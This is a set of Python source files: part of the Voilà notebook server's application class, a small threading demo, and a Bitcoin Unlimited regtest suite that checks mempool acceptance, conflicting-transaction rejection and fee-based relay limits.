the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = AsyncMappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def listen(self):
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
thread_test1.py
|
"""
# @Time : 2020/8/2
# @Author : Jimou Chen
"""
import time
import threading
def sing():
for i in range(3):
print('singing ...')
time.sleep(1)
def dance():
for i in range(3):
print('dancing ...')
time.sleep(1)
if __name__ == '__main__':
# 创建线程
sing_thread = threading.Thread(target=sing)
dance_thread = threading.Thread(target=dance)
# 启动线程
sing_thread.start()
dance_thread.start()
sing_thread.join()
dance_thread.join()
|
mempool_accept.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
# This test exercises the mempool acceptance data path.
from threading import Thread
import time
import subprocess
import sys
if sys.version_info[0] < 3:
raise "Use Python 3"
import logging
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import *
import test_framework.cashlib as cashlib
from test_framework.nodemessages import *
from test_framework.script import *
BitcoinCli = "bitcoin-cli" # Will be amended with the path during initialization
class PayDest:
"""A payment destination. All the info you need to send a payment here and make a subsequent payment
from this address"""
def __init__(self, node=None):
"""Pass a node to use an address from that node's wallet. Pass None to generate a local address"""
if node is None:
self.privkey = cashlib.randombytes(32)
else:
addr = node.getnewaddress()
privb58 = node.dumpprivkey(addr)
self.privkey = decodeBase58(privb58)[1:-5]
self.pubkey = cashlib.pubkey(self.privkey)
self.hash = cashlib.addrbin(self.pubkey)
def __str__(self):
return "priv:%s pub:%s hash:%s" % (hexlify(self.privkey), hexlify(self.pubkey), hexlify(self.hash))
def createConflictingTx(dests, source, count, fee=1):
""" Create "count" conflicting transactions that spend the "source" to "dests" evenly. Conflicting tx are created
by varying the fee. Change the base "fee" if you want which is actually the fee PER dest.
source: a dictionary in RPC listunspent format, with additional "privkey" field which is the private key in bytes
dests: a list of PayDest objects.
count: the number of conflicting tx to return
fee: what to deduct as the fee (in Satoshi)
"""
generatedTx = []
hexOP_DUP = OP_DUP.toHex()
binOP_DUP = ord(OP_DUP.toBin())
for c in range(count):
w = source
if 1:
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(w["txid"], w["vout"]), b"", 0xffffffff))
amt = int(w["satoshi"] / len(dests)) - (fee + c) # really total fee ends up fee*dest
i = 0
for d in dests:
script = CScript([OP_DUP, OP_HASH160, d.hash, OP_EQUALVERIFY, OP_CHECKSIG])
tx.vout.append(CTxOut(amt, script))
i += 1
sighashtype = 0x41
sig = cashlib.signTxInput(tx, 0, w["satoshi"], w["scriptPubKey"], w["privkey"], sighashtype)
# construct the signature script -- it may be one of 2 types
if w["scriptPubKey"][0:2] == hexOP_DUP or w["scriptPubKey"][0] == binOP_DUP: # P2PKH starts with OP_DUP
tx.vin[0].scriptSig = cashlib.spendscript(sig, w["pubkey"]) # P2PKH
else:
tx.vin[0].scriptSig = cashlib.spendscript(sig) # P2PK
generatedTx.append(tx)
return generatedTx
def createTx(dests, sources, node, maxx=None, fee=1, nextWallet=None, generatedTx=None):
""" Create "maxx" transactions that spend from individual "sources" to every "dests" evenly (many fan-out
transactions). If "generatedTx" is a list the created transactions are put into it. Otherwise they are
sent to "node". If "nextWallet" is a list the outputs of all these created tx are put into it in a format
compatible with "sources" (you can use nextWallet as the sources input in a subsequent call to this function).
Change the base "fee" if you want which is actually the fee PER dest.
sources: list of dictionaries in RPC listunspent format, with optional additional "privkey" field which
is the private key in bytes. If "privkey" does not exist, "node" is asked for it.
dests: a list of PayDest objects.
fee: what to deduct as the fee (in Satoshi)
nextWallet: [output] pass an empty list to get a valid wallet if all the createdTx are committed.
generatedTx: [output] pass an empty list to skip submitting the tx to node, and instead return them in this list.
returns the number of transactions created.
"""
hexOP_DUP = OP_DUP.toHex()
binOP_DUP = ord(OP_DUP.toBin())
count = 0
for w in sources:
nextOuts = []
if not count is None and count == maxx:
break
# if sources is from a bitcoind wallet, I need to grab some info in order to sign
if not "privkey" in w:
privb58 = node.dumpprivkey(w["address"])
privkey = decodeBase58(privb58)[1:-5]
pubkey = cashlib.pubkey(privkey)
w["privkey"] = privkey
w["pubkey"] = pubkey
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(w["txid"], w["vout"]), b"", 0xffffffff))
amt = int(w["satoshi"] / len(dests)) - fee # really fee ends up fee*dest
i = 0
for d in dests:
script = CScript([OP_DUP, OP_HASH160, d.hash, OP_EQUALVERIFY, OP_CHECKSIG])
tx.vout.append(CTxOut(amt, script))
nextOuts.append({"vout": i, "privkey": d.privkey, "scriptPubKey": script,
"satoshi": amt, "pubkey": d.pubkey})
i += 1
sighashtype = 0x41
n = 0
# print("amountin: %d amountout: %d outscript: %s" % (w["satoshi"], amt, w["scriptPubKey"]))
sig = cashlib.signTxInput(tx, n, w["satoshi"], w["scriptPubKey"], w["privkey"], sighashtype)
if w["scriptPubKey"][0:2] == hexOP_DUP or w["scriptPubKey"][0] == binOP_DUP: # P2PKH starts with OP_DUP
tx.vin[n].scriptSig = cashlib.spendscript(sig, w["pubkey"]) # P2PKH
else:
tx.vin[n].scriptSig = cashlib.spendscript(sig) # P2PK
if not type(generatedTx) is list: # submit these tx to the node
txhex = hexlify(tx.serialize()).decode("utf-8")
txid = None
try:
txid = node.sendrawtransaction(txhex)
except JSONRPCException as e:
logging.error("TX submission failed because %s" % str(e))
logging.error("tx was: %s" % txhex)
logging.error("amountin: %d amountout: %d outscript: %s" % (w["satoshi"], amt, w["scriptPubKey"]))
raise
else: # return them in generatedTx
generatedTx.append(tx)
for out in nextOuts:
tx.rehash()
out["txid"] = tx.hash
# I've already filled nextOuts with all the other needed fields
if type(nextWallet) is list:
nextWallet += nextOuts
count += 1
return count
class MyTest (BitcoinTestFramework):
def __init__(self, bigTest=0):
self.bigTest = bigTest
BitcoinTestFramework.__init__(self)
def setup_chain(self, bitcoinConfDict=None, wallets=None):
logging.info("Initializing test directory " + self.options.tmpdir)
initialize_chain(self.options.tmpdir, bitcoinConfDict, wallets)
def setup_network(self, split=False):
self.nodes = start_nodes(2, self.options.tmpdir, [["-rpcworkqueue=100"], ["-rpcworkqueue=100"]])
# Now interconnect the nodes
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split = False
self.sync_all()
def threadedCreateTx(self, dests, sources, nodeIdx, maxx=None):
"""Create a bunch of transactions using multiple python threads"""
NUMTHREADS = 4
if sources is None:
wallets = self.nodes[nodeIdx].listunspent()
else:
wallets = sources
total = min(len(wallets), maxx)
logging.info("creating %d tx desired %d" % (total, maxx))
wchunks = []
count = 0
for i in range(NUMTHREADS - 1):
start = count
count += int(total / NUMTHREADS)
wchunks.append(wallets[start: count])
wchunks.append(wallets[count:])
threads = []
outputs = []
txPerThread = int(total / NUMTHREADS)
for i in range(NUMTHREADS - 1):
node = get_rpc_proxy(self.nodes[nodeIdx].url, nodeIdx, timeout=30)
t = Thread(target=createTx, args=(dests, wchunks[i], node, txPerThread, 1, outputs))
t.start()
threads.append(t)
createTx(dests, wchunks[NUMTHREADS - 1], self.nodes[nodeIdx],
total - (txPerThread * (NUMTHREADS - 1)), 1, outputs)
for t in threads:
t.join()
return (total, outputs)
def conflictTest(self, dests0, dests1, wallet, numNodes=2):
"""Tests issuing a bunch of conflicting transactions. Expects that you give it a wallet with lots of free UTXO, and nothing in the mempool
"""
logging.info("conflict test")
assert(self.nodes[0].getmempoolinfo()["size"] == 0) # Expects a clean mempool
if 1: # test many conflicts
NTX = 50
i = 0
for c in range(NTX):
source = wallet.pop()
txs = createConflictingTx(dests0, source, c)
for t in txs:
n = self.nodes[i % len(self.nodes)]
n.enqueuerawtransaction(t.toHex())
i += 1
for n in self.nodes:
waitFor(30, lambda: True if n.getmempoolinfo()["size"] >= NTX - 5 else None)
# we have to allow < because bloom filter false positives in the node's
# sending logic may cause it to not get an INV
time.sleep(1)
for n in self.nodes:
assert(n.getmempoolinfo()["size"] <= NTX) # if its > then a doublespend got through
self.commitMempool() # clear out this test
if 1: # test 2 conflicting transactions
NTX = 25
wallet2 = []
gtx2 = []
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 1, wallet2, gtx2)
wallet3 = []
gtx3 = []
# create conflicting tx with slightly different payment amounts
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 2, wallet3, gtx3)
# Send two double spending trnasactions using a subprocess. This checks that sendrawtransaction
# does not allow double spends into the mempool when multiple threads are sending transactions.
conflict_count = 0;
rpc_u, rpc_p = rpc_auth_pair(0)
gtx = zip(gtx2, gtx3)
for g in gtx:
# send first tx
# if datadir is not provided, it assumes ~/.bitcoin so this code may sort of work if you
# happen to have a ~/.bitcoin since relevant parameters are overloaded. But that's ugly,
# so supply datadir correctly.
p1 = subprocess.Popen([BitcoinCli, "-datadir=" + self.options.tmpdir + os.sep + "node0", "-rpcconnect=127.0.0.1", "-rpcport=" + str(rpc_port(0)), "-rpcuser=" + rpc_u, "-rpcpassword=" + rpc_p, "sendrawtransaction", g[0].toHex()], universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# send double spend
p2 = subprocess.Popen([BitcoinCli, "-datadir=" + self.options.tmpdir + os.sep + "node0", "-rpcconnect=127.0.0.1", "-rpcport=" + str(rpc_port(0)), "-rpcuser=" + rpc_u, "-rpcpassword=" + rpc_p, "sendrawtransaction", g[1].toHex()], universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_data1, stderr_data1 = p1.communicate(timeout=5)
stdout_data2, stderr_data2 = p2.communicate(timeout=5)
if (stderr_data1.find("txn-mempool-conflict") >= 0):
conflict_count += 1;
if (stderr_data2.find("txn-mempool-conflict") >= 0):
conflict_count += 1;
waitFor(1, lambda: True if conflict_count == NTX else print("num conflicts found:" + str(conflict_count) + ", node0 mempool size:" + str(self.nodes[0].getmempoolinfo()["size"]) + ", node1 mempool size:" + str(self.nodes[1].getmempoolinfo()["size"])))
waitFor(30, lambda: True if self.nodes[0].getmempoolinfo()["size"] == NTX else None)
waitFor(30, lambda: True if self.nodes[1].getmempoolinfo()["size"] == NTX else None)
# forget about the tx I used above
wallet = wallet[NTX:]
NTX1 = NTX
# test conflicting tx sent to different nodes
NTX = 50
wallet2 = []
gtx2 = []
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 1, wallet2, gtx2)
wallet3 = []
gtx3 = []
# create conflicting tx with slightly different payment amounts
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 2, wallet3, gtx3)
gtx = zip(gtx2, gtx3)
count = 0
mempools = [x.getmempoolinfo() for x in self.nodes]
for g in gtx:
count += 1
self.nodes[count % numNodes].enqueuerawtransaction(g[0].toHex())
try:
self.nodes[(count + 1) % numNodes].enqueuerawtransaction(g[1].toHex())
except JSONRPCException as e:
if e.error["code"] != -26 or e.error["code"] == -26: # txn-mempool-conflict
pass # we may get an error or not depending on propagation speed of 1st tx
# There is no good way to tell if the mempool sync process has fully
# completed because out of testing the process of accepting tx is never
# complete so sleep a little while first before checking.
time.sleep(2) #wait for all txns to propagate
waitFor(30, lambda: True if self.nodes[0].getmempoolinfo()["size"] == NTX + NTX1 else None)
waitFor(30, lambda: True if self.nodes[1].getmempoolinfo()["size"] == NTX + NTX1 else None)
# forget about the tx I used
wallet = wallet[NTX:]
logging.info("conflict test done")
def commitMempool(self):
"""Commit all the tx in mempools on all nodes into blocks"""
for n in self.nodes:
while n.getmempoolinfo()["size"] != 0:
n.generate(1)
self.sync_blocks()
def removeTxPersistFiles(self):
for d in ["node%d" % x for x in range(1,5)]:
fname = self.options.tmpdir + os.sep + d + os.sep + "regtest" + os.sep + "mempool.dat"
if os.path.exists(fname):
os.remove(fname)
fname = self.options.tmpdir + os.sep + d + os.sep + "regtest" + os.sep + "orphanpool.dat"
if os.path.exists(fname):
os.remove(fname)
def run_test(self):
decContext = decimal.getcontext().prec
decimal.getcontext().prec = 8 + 8 # 8 digits to get to 21million, and each bitcoin is 100 million satoshis
self.nodes[0].generate(152)
self.sync_blocks()
# Get some addresses
dests1 = [PayDest(self.nodes[1]) for x in range(20)]
dests0 = [PayDest(self.nodes[0]) for x in range(20)]
# Create 51 transaction and ensure that they get synced
NTX = 51
(amt, wallet) = self.threadedCreateTx(dests1, None, 0, NTX)
assert(amt == NTX)
waitFor(10, lambda: True if self.nodes[0].getmempoolinfo()["size"] >= NTX else None)
mp = waitFor(30, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[1].getmempoolinfo()
["size"] < 5 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
logging.info(mp)
w0 = wallet[0:500]
wallet = wallet[500:]
self.commitMempool()
self.conflictTest(dests0, dests1, w0)
self.commitMempool()
# Create 500 transaction and ensure that they get synced
NTX = 500 if self.bigTest else 100
start = time.monotonic()
(amt, wallet) = self.threadedCreateTx(dests0, wallet, 1, NTX)
end = time.monotonic()
logging.info("created %d tx in %s seconds. On node 0. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
mp = waitFor(20, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[1].getmempoolinfo()
["size"] < 10 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
logging.info(mp)
# Create 5000 transactions and ensure that they get synced
if self.bigTest:
self.commitMempool()
NTX = 5000
start = time.monotonic()
(amt, wallet) = self.threadedCreateTx(dests1, wallet, 0, NTX)
end = time.monotonic()
logging.info("created %d tx in %s seconds. On node 0. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
mp = waitFor(300, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[1].getmempoolinfo()
["size"] < 20 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
logging.info(mp)
if self.bigTest:
self.commitMempool()
NTX = 10000
start = time.monotonic()
(amt, wallet) = self.threadedCreateTx(dests0, wallet, 1, NTX)
end = time.monotonic()
logging.info("created %d tx in %s seconds. On node 0. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
start = time.monotonic()
mp = waitFor(300, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[0].getmempoolinfo()[
"size"] < 50 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
end = time.monotonic()
logging.info("synced %d tx in %s seconds. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
logging.info(mp)
# Now test pushing all of the mempool tx to other nodes
NTX = self.nodes[0].getmempoolinfo()["size"] # find how many I am pushing
# Start up node 3
self.nodes.append(start_node(2, self.options.tmpdir))
connect_nodes_bi(self.nodes, 0, 2)
sync_blocks(self.nodes)
# Push all tx to node 3 from one node
destName = "127.0.0.1:" + str(p2p_port(2))
start = time.monotonic()
self.nodes[0].pushtx(destName)
mp = waitFor(120, lambda: [x.getmempoolinfo() for x in self.nodes]
if NTX - self.nodes[2].getmempoolinfo()["size"] < 30 else None)
end = time.monotonic()
logging.info("synced %d tx in %s seconds. Speed %f tx/sec" % (NTX, end - start, float(NTX) / (end - start)))
# Regression test the stats now. Ideally this would be in an isolated test, but this can be done here quickly
# and Travis runs out of time often.
for n in self.nodes:
result = n.getstatlist()
# logging.info(result)
result = n.getstat("memPool/txAdded", "sec10", 100)
logging.info(result)
result = n.getstat("memPool/size", "min5")
logging.info(result)
result = n.getstat("net/recv/msg/inv", "sec10", 20)
logging.info(result)
result = n.getstat("net/recv/total", "sec10", 20)
logging.info(result)
result = n.getstat("net/send/total", "sec10")
logging.info(result)
if self.bigTest:
# Start up node 4
self.nodes.append(start_node(3, self.options.tmpdir))
connect_nodes_bi(self.nodes, 0, 3)
connect_nodes_bi(self.nodes, 1, 3)
connect_nodes_bi(self.nodes, 2, 3)
sync_blocks(self.nodes)
# Push all tx to node 4 from many nodes
destName = "127.0.0.1:" + str(p2p_port(3))
start = time.monotonic()
self.nodes[0].pushtx(destName)
self.nodes[1].pushtx(destName)
self.nodes[2].pushtx(destName)
# Large mempool sync if running in debug mode (with periodic mempool checking) will be very slow
mp = waitFor(300, lambda: [x.getmempoolinfo() for x in self.nodes]
if NTX - self.nodes[3].getmempoolinfo()["size"] < 30 else print ([x.getmempoolinfo()["size"] for x in self.nodes]))
end = time.monotonic()
logging.info("synced %d tx in %s seconds. Speed %f tx/sec" % (NTX, end - start, float(NTX) / (end - start)))
# Stop and start 4 nodes with different minlimitertxfee's. Then send transactions with varying
# fees and see if they propagated correctly.
self.nodes[0].generate(1) # clean up
self.sync_blocks()
logging.info("starting mempool limiting tests")
stop_nodes(self.nodes)
wait_bitcoinds()
self.removeTxPersistFiles()
self.nodes = start_nodes(4, self.options.tmpdir, [["-minlimitertxfee=1.0", "-limitfreerelay=0"], ["-minlimitertxfee=2.0", "-limitfreerelay=0"], ["-minlimitertxfee=3.5", "-limitfreerelay=0"], ["-minlimitertxfee=0.0", "-limitfreerelay=0"]])
# Now interconnect the nodes
interconnect_nodes(self.nodes)
self.sync_blocks()
txId = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
waitFor(20, lambda: txId in self.nodes[0].getrawmempool())
waitFor(20, lambda: txId in self.nodes[3].getrawmempool())
try:
txObj1 = self.nodes[0].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj2 = self.nodes[1].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
try:
txObj3 = self.nodes[2].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
try:
txObj4 = self.nodes[3].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
txId = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
waitFor(20, lambda: txId in self.nodes[0].getrawmempool())
waitFor(20, lambda: txId in self.nodes[1].getrawmempool())
waitFor(20, lambda: txId in self.nodes[3].getrawmempool())
try:
txObj1 = self.nodes[0].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj2 = self.nodes[1].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj3 = self.nodes[2].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
try:
txObj4 = self.nodes[3].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
self.nodes[3].set("minlimitertxfee=5")
txId = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
waitFor(20, lambda: txId in self.nodes[0].getrawmempool())
waitFor(20, lambda: txId in self.nodes[1].getrawmempool())
waitFor(20, lambda: txId in self.nodes[2].getrawmempool())
try:
txObj1 = self.nodes[0].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj2 = self.nodes[1].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj3 = self.nodes[2].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj4 = self.nodes[3].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
# Stop and start 4 nodes with different limitfreerelay's. Then send transactions with varying
# fees and see if they propagated correctly.
stop_nodes(self.nodes)
wait_bitcoinds()
self.removeTxPersistFiles()
self.nodes = start_nodes(4, self.options.tmpdir, [["-minlimitertxfee=0.0", "-limitfreerelay=0"], ["-minlimitertxfee=1.0", "-limitfreerelay=1"], ["-minlimitertxfee=2.0", "-limitfreerelay=1"], ["-minlimitertxfee=3.0", "-limitfreerelay=2"]])
#clear all mempools by mining a block
interconnect_nodes(self.nodes)
self.nodes[0].generate(1)
self.sync_blocks()
for i in range(100):
self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
# check all mempools. Nodes 2 and 3 will have had free transactions rate limited with node 2 having
